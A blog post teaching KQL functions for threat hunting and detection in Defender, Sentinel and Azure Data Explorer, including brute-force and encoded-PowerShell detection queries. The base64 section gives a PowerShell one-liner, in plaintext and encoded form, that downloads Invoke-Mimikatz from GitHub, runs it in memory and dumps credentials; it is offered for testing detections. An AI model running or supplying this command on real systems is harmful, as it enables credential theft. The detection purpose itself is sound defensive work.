KQL Functions For Security Operations

In recent years Kusto Query Language (KQL) has gotten a more and ever increasing place in the cyber security world. The language offers a powerful arsenal of functions and capabilities that can be leveraged for SOC operations, incident investigation, threat hunting, and detection engineering. In this blog, we explore several KQL functions. We will uncover how security teams can use KQL to get insight into new query possibilities. Whether you use KQL in 365 Defender, Sentinel or Azure Data Explorer, all the functions can be used in all of the places regardless of where your logs are stored.

In this blog the following functions are discussed, together with example code and an explanation of why this functions are useful in security (and also in different) contexts.

ipv4_is_private()

Scoping KQL queries to only public or private addresses can be very useful. To detect exfiltration or command and control activities public IPs are often in scope, do you want to detect lateral movement to internal systems? Then filtering on private addresses can be useful to limit false positives. The function ipv4_is_private() is specifically designed to take any IPv4 address as input and return whether the IP is private (return true) or public (return false). The input can be a single IP string, but also a column that contains IP addresses to directly return the results for your whole dataset. This function can be leveraged by extending the current KQL query to include a boolean field that contains the return value of the function, or it can be used in a condition clause.

Extend selection:

DeviceNetworkEvents
| extend IsPrivate = ipv4_is_private(RemoteIP)
| summarize count() by IsPrivate

Conditional clause:

let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}';
DeviceProcessEvents
| where DeviceName == DeviceName
| extend IPAddress = extract(IPRegex, 0, ProcessCommandLine)
| where not(ipv4_is_private(IPAddress))

The conditional clause extracts first all IPv4 addresses from the commandline (not related to this function specific, but a practical example) and then only selects the public IPs, because they are most interesting for threat hunting.

Info
The function returns empty values in the case of IPv6 addresses. This can be solved by using a IPV4 regex as shown in the Conditional clause example.

Documentation: https://learn.microsoft.com/en-us/azure/data-explorer/kusto/query/ipv4-is-privatefunction

Example queries:

base64_decode_tostring()

We know that adversaries like to evade detection, and while base64 encoding would not be the best method, it is still used. Instead of decoding base64 strings in an external website, the function base64_decode_tostring() can be used directly in your KQL prompt. The function only takes one argument and that is the encoded base64 string. This function is extremely useful when hunting for encoded PowerShell or when building detections on encoded proces executions. To explain the usage of the function better, I have simulated an actor which used an encoded PowerShell command to invoke Mimikatz and dump credentials.

/images/KQL-For-Security-Operations/EncodedExecution.png
Encoded PowerShell Execution

With the use of KQL, we can detect the usage of encoded PowerShell in the DeviceProcessEvents table. Without the usage of this function we can a base64 string which does not specify whether it is malicious or not, therefore we leverage the base64_decode_tostring() function and make the text readable. In order to do so we first have to extract the base64 string from the commandline, because a base64 and text mixed string will not be translated. Once your base64 string is extracted it can be used as a variable in the function and displayed as a new column (or printed if you prefer that approach). The work for analysts can now start to investigate if this behaviour needs to be contained.

/images/KQL-For-Security-Operations/decodedkql.png
Decoded Results

KQL Query

Extraction and translation of base64 commandline strings.

let EncodedList = dynamic(['-encodedcommand', '-enc', '-e']);
DeviceProcessEvents
| where ProcessCommandLine contains "powershell" or InitiatingProcessCommandLine contains "powershell"
| where ProcessCommandLine has_any (EncodedList) or InitiatingProcessCommandLine has_any (EncodedList)
| extend base64String = extract(@'\s+([A-Za-z0-9+/]{20}\S+$)', 1, ProcessCommandLine)
| extend DecodedCommandLine = base64_decode_tostring(base64String)
| where not(isempty(base64String) and isempty(DecodedCommandLine))
| project ProcessCommandLine, DecodedCommandLine

If you want to try these tests yourself the commands in the Experiment with Encoded PowerShell commands can be used. Both the plaintext and the encoded commands are shared. Note: These will trigger alerts

Experiment with Encoded PowerShell commands

Plain Text

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

Encoded

"powershell.exe" -e cG93ZXJzaGVsbC5leGUgLWV4ZWMgYnlwYXNzIC1DICJJRVggKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9FbXBpcmVQcm9qZWN0L0VtcGlyZS9tYXN0ZXIvZGF0YS9tb2R1bGVfc291cmNlL2NyZWRlbnRpYWxzL0ludm9rZS1NaW1pa2F0ei5wczEnKTtJbnZva2UtTWltaWthdHogLUR1bXBDcmVkcyI=

Source: https://gist.github.com/mehmethafif/03305b668be52ecaff270bac1700662f

Documentation: https://learn.microsoft.com/en-us/azure/data-explorer/kusto/query/base64_decode_tostringfunction

Example queries:

geo_info_from_ip_address()

Where IP information had to be retrieved via WatchLists or Logic Apps in the past, does the function geo_info_from_ip_address() provide a native solution within KQL to enrich the query results. The geolocation information can be collected for both IPv4 and IPv6 addresses. The function only takes a IpAddress as input and returns the country, state, city, latitude and longitude that are related to the IpAddress. The image below shows the results of an enriched IpAddress, note that in this case, not all data was available.

/images/KQL-For-Security-Operations/geo_info_from_ip_address.png
geo_info_from_ip_address()

For query enrichment, only two lines of KQL code need to be added to your existing queries. The first line returns a JSON blob that contains all the needed information, the second extracts each field into a column thereby enabling easy filter options.

| extend GeoIPInfo = geo_info_from_ip_address(RemoteIP)
| extend country = tostring(parse_json(GeoIPInfo).country), 
    state = tostring(parse_json(GeoIPInfo).state), 
    city = tostring(parse_json(GeoIPInfo).city), 
    latitude = tostring(parse_json(GeoIPInfo).latitude), 
    longitude = tostring(parse_json(GeoIPInfo).longitude)

This function allows defenders to quickly get insight into IP information that is related to a connection. This opens new detection possibilities to enrich current detections, build new detections based on IP information and add further logic to for example raise incident severities if an incident is triggered from a orange/red country.

DeviceNetworkEvents
| where RemoteIP == "5.42.64.39"
| extend GeoIPInfo = geo_info_from_ip_address(RemoteIP)
| extend country = tostring(parse_json(GeoIPInfo).country), 
    state = tostring(parse_json(GeoIPInfo).state), 
    city = tostring(parse_json(GeoIPInfo).city), 
    latitude = tostring(parse_json(GeoIPInfo).latitude), 
    longitude = tostring(parse_json(GeoIPInfo).longitude)
| project Timestamp, RemoteIP, country, state, city, latitude, longitude
Info
If you add the geo_info_from_ip_address() function to existing KQL queries, do not forget to add the new fields to your project statements. Otherwise adding the fields will still not add value to your detections.

Documentation: https://learn.microsoft.com/en-us/azure/data-explorer/kusto/query/geo-info-from-ip-address-function

Example queries:

bin()

The exact definition of the bin function is specified as rounds values down to an integer multiple of a given bin size. From a security perspective, this function is especially useful if you want to detect if one bin is bigger than the normal bin size. This sounds very abstract, thus we take a practical security example: Brute Force attacks. Brute Force attacks are defined as a large peak in failed login attempts (and maybe a successful one) in a small amount of time. The time is then the format of the bin and the amount of failed logins is then the content of the bin.

/images/KQL-For-Security-Operations/trash-1005249_1280.jpg
Bins

If we translate this to KQL we get the query as shown below. First, select the size of our bin, in this case, our bin is size 15 minutes (m = minutes, h = hours, d = days). Then we select what the threshold for alerting on a bin is in our case at least 20 failed logins. This results in the goal to list all results where 20 or more logins happened within 15 minutes. The next step is to query the logs for failed logins and get the general count for each bin. Because we do not want to have the total of failed logins from all user accounts, but per specific user account I have added another by-clause that lists all results where 20 or more logins happened within 15 minutes per AccountSid. The last step is to filter all the failed logins to only select the bins that have a size equal to or greater than 20. Voila, your first brute force detection has been created!

let TimeFrame = 15m;
let FailedLogonThreshold = 20;
DeviceLogonEvents
| where ActionType == "LogonFailed"
| summarize TotalFailedAttempts = count() by bin(Timestamp, TimeFrame), AccountSid
// For Sentinel Users: 
//| summarize TotalFailedAttempts = count() by bin(TimeGenerated, TimeFrame), AccountSid
| where TotalFailedAttempts >= FailedLogonThreshold

Defender For Endpoint Custom Detection Rule

Defender For endpoint requires the following fields to be included in a detection: DeviceId, Timestamp, ReportId. For Sentinel, the query above can already be used, but details are lacking, thus I recommend also using this one. In the query above not all required MDE custom detection fields have been mentioned, thus hereby a query that used the arg_max() function to collect all the details from the last event in that bin from that AccountSid to create your custom detection rule.

let TimeFrame = 15m;
let FailedLogonThreshold = 20;
DeviceLogonEvents
| where ActionType == "LogonFailed"
| summarize arg_max(Timestamp, *), TotalFailedAttempts = count() by bin(Timestamp, TimeFrame), AccountSid
| where TotalFailedAttempts >= FailedLogonThreshold
| project-reorder Timestamp, TotalFailedAttempts, AccountSid
Documentation: https://learn.microsoft.com/en-us/azure/data-explorer/kusto/query/binfunction

Example queries:

Questions? Feel free to reach out to me on any of my socials.